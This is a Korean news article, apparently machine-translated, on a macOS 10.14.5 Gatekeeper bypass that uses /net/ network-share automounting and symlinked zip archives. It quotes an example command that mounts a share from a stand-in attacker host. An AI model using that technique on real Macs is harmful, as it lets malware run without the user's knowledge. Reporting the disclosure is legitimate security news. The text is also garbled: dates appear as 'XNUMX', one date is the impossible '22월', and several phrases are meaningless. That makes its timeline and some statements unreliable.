아마야 토만 보안 연구원인 Filippo Cavalarin은 자신의 블로그에 macOS 10.14.5의 버그에 대한 경고를 게시했습니다. 이는 Gatekeeper의 보안 조치를 완전히 우회할 가능성으로 구성됩니다. Cavalarin에 따르면, 그는 이미 올해 XNUMX월에 Apple에 오류를 지적했지만 회사는 최신 업데이트에서 이를 수정하지 않았습니다.
Gatekeeper는 Apple에서 개발하여 2012년 처음으로 데스크톱 운영 체제에 통합되었습니다. 이는 사용자가 알지 못하고 동의하지 않은 애플리케이션이 실행되는 것을 방지하는 메커니즘입니다. 앱을 다운로드한 후 Gatekeeper는 자동으로 코드를 확인하여 해당 소프트웨어가 Apple에서 적절하게 서명되었는지 확인합니다.
그것은 수 관심을 가져라
Cavalarin은 자신의 블로그 게시물에서 Gatekeeper가 기본적으로 외부 스토리지와 네트워크 공유를 모두 안전한 위치로 간주한다고 언급했습니다. 따라서 이러한 대상에 있는 모든 응용 프로그램은 Gatekeeper 검사를 거치지 않고도 자동으로 시작될 수 있습니다. 사용자가 모르는 사이에 악성 소프트웨어를 실행하는 데 악용될 수 있는 것이 바로 이 기능입니다.
무단 액세스를 허용하는 한 가지 측면은 사용자가 "/net/"로 시작하는 경로를 지정하여 네트워크 공유를 자동으로 마운트할 수 있는 자동 마운트 기능입니다. 예를 들어 Cavalarin은 "ls /net/evil-attacker.com/sharedfolder/" 경로를 인용하여 운영 체제가 잠재적으로 악성일 수 있는 "sharefolder" 폴더의 콘텐츠를 원격 위치에 로드하도록 할 수 있습니다.
비디오에서 위협이 작동하는 방식을 볼 수 있습니다.
또 다른 요인은 자동 마운트 기능으로 이어지는 특정 심볼릭 링크가 포함된 zip 아카이브가 공유되는 경우 Gatekeeper에서 확인하지 않는다는 사실입니다. 이런 방식으로 피해자는 쉽게 악성 아카이브를 다운로드하고 압축을 풀 수 있어 공격자가 사용자 모르게 Mac에서 거의 모든 소프트웨어를 실행할 수 있습니다. 기본적으로 특정 확장을 숨기는 Finder에도 이 취약점이 있습니다.
Cavalarin은 자신의 블로그에서 Apple이 올해 22월 XNUMX일 macOS 운영 체제의 취약점에 대해 주의를 기울였다고 밝혔습니다. 그러나 XNUMX월 중순, Apple은 Cavalarin과의 통신을 중단했고, Cavalarin은 모든 것을 공개하기로 결정했습니다.
드로이 : FCVL
